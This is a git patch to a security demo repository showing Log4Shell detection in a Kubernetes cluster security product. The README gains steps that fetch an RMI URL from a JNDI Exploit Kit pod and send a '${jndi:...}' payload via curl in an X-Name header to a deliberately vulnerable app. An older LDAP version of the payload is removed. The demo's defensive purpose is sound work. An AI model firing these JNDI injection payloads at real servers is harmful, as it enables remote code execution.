From 79c27102ce80aea91a8604f8d8ba3cb1227100d5 Mon Sep 17 00:00:00 2001
From: Nicolas MASSE <nicolas.masse@itix.fr>
Date: Wed, 23 Feb 2022 17:39:18 +0100
Subject: [PATCH] fix pipeline notifications

---
 .gitignore                                    |  2 +
 README.md                                     | 48 ++++++++++++-------
 cicd/70-tasks.yaml                            |  2 +-
 ...log4shell.json => log4shell.json.template} |  5 +-
 4 files changed, 36 insertions(+), 21 deletions(-)
 rename policy/{log4shell.json => log4shell.json.template} (96%)

diff --git a/.gitignore b/.gitignore
index 4b40ff6..5d8a648 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,4 @@
 dockercfg
 *.bak
+log4shell.json
+
diff --git a/README.md b/README.md
index e22a4d9..d8d22b5 100644
--- a/README.md
+++ b/README.md
@@ -165,6 +165,12 @@ Deploy the vulnerable app.
 oc kustomize deployment | oc apply -f -
 ```
 
+Run the cleanup script.
+
+```
+ansible-playbook cleanup/cleanup.yaml
+```
+
 ## Demo scenario
 
 ### Build the inventory
@@ -178,7 +184,29 @@ oc kustomize deployment | oc apply -f -
 
 ### Intrusion
 
-* In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy
+In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy
+
+* Get the RMI URL with:
+
+  ```sh
+  oc logs -n exploitkit-log4j deploy/jndi-exploit-kit |grep -A1 "BYPASS WITH EL by @welk1n"
+  EXPLOIT_URL="$(oc logs -n exploitkit-log4j deploy/jndi-exploit-kit | grep -A1 "BYPASS WITH EL by @welk1n" | grep rmi:// | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g')"
+  ```
+
+* Find the URL of the vulnerable container.
+
+  ```sh
+  export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/"
+  ```
+
+* Send the exploit
+
+  ```sh
+  curl "$TARGET" -H "X-Name: \${jndi:$EXPLOIT_URL}"
+  ```
+
+Then, show the violation:
+
 * Open the **Violations** tab
 * Filter by **Namespace**: `vulnerable-log4j`
 * Go to the OpenShift console
@@ -186,7 +214,7 @@ oc kustomize deployment | oc apply -f -
 * Delete the pod
 * In the Central, clear the Violation
 * Drill down to **Platform Configuration** > **System policies**
-* Open the **Log4Shell** policy
+* Open the **Shell Spawned by Java Application** policy
 * Click the **Edit** button
 * On the fourth tab, show the automatic enforcement options
 
@@ -241,20 +269,6 @@ Cleanup
 
 ```sh
 oc kustomize deployment | oc delete -f -
-oc delete pods -n vulnerable-cicd --all
+oc delete pods,builds,pipelineruns -n vulnerable-cicd --all
 oc start-build vulnerable-log4j -n vulnerable-cicd
 ```
-
-## Exploit
-
-Find the URL of the vulnerable container.
-
-```sh
-export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/"
-```
-
-Go to https://log4shell.huntress.com/ and pass the generated string in the `X-Name` HTTP header.
-
-```sh
-curl "$TARGET" -H 'X-Name: ${jndi:ldap://log4shell.huntress.com:1389/e597d75d-1851-4133-9a08-d5dfd7e04264}'
-```
diff --git a/cicd/70-tasks.yaml b/cicd/70-tasks.yaml
index 0b78e3e..7728a01 100644
--- a/cicd/70-tasks.yaml
+++ b/cicd/70-tasks.yaml
@@ -89,4 +89,4 @@ spec:
         NAME=`skopeo inspect "docker://$(params.image)" --format '{{.Name}}' --creds token:$TOKEN`
         curl -s -k -L -H "Authorization: Bearer $ROX_API_TOKEN" "https://$ROX_CENTRAL_ENDPOINT/api/cli/download/roxctl-linux" --output /tmp/roxctl  > /dev/null
         chmod +x /tmp/roxctl
-        /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST"
+        /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST" --send-notifications
diff --git a/policy/log4shell.json b/policy/log4shell.json.template
similarity index 96%
rename from policy/log4shell.json
rename to policy/log4shell.json.template
index fa2fc90..eb7efa1 100644
--- a/policy/log4shell.json
+++ b/policy/log4shell.json.template
@@ -1,7 +1,6 @@
 {
     "policies": [
         {
-            "id": "7f0ef11c-f9b1-4af1-9181-e24b1c27285c",
             "name": "Log4Shell",
             "description": "Alert on deployments with images containing the Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021-45046). There are flaws in the Java logging library Apache Log4j in versions from 2.0-beta9 to 2.15.0, excluding 2.12.2.",
             "rationale": "These vulnerabilities allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.",
@@ -24,7 +23,7 @@
                 "FAIL_BUILD_ENFORCEMENT"
             ],
             "notifiers": [
-                "27197fcf-5d2c-4fb6-a9bd-9e755f739944"
+                "{{ notifier_id }}"
             ],
             "lastUpdated": "2022-02-21T14:19:19.206939932Z",
             "SORTName": "",
@@ -67,4 +66,4 @@
             "isDefault": false
         }
     ]
-}
\ No newline at end of file
+}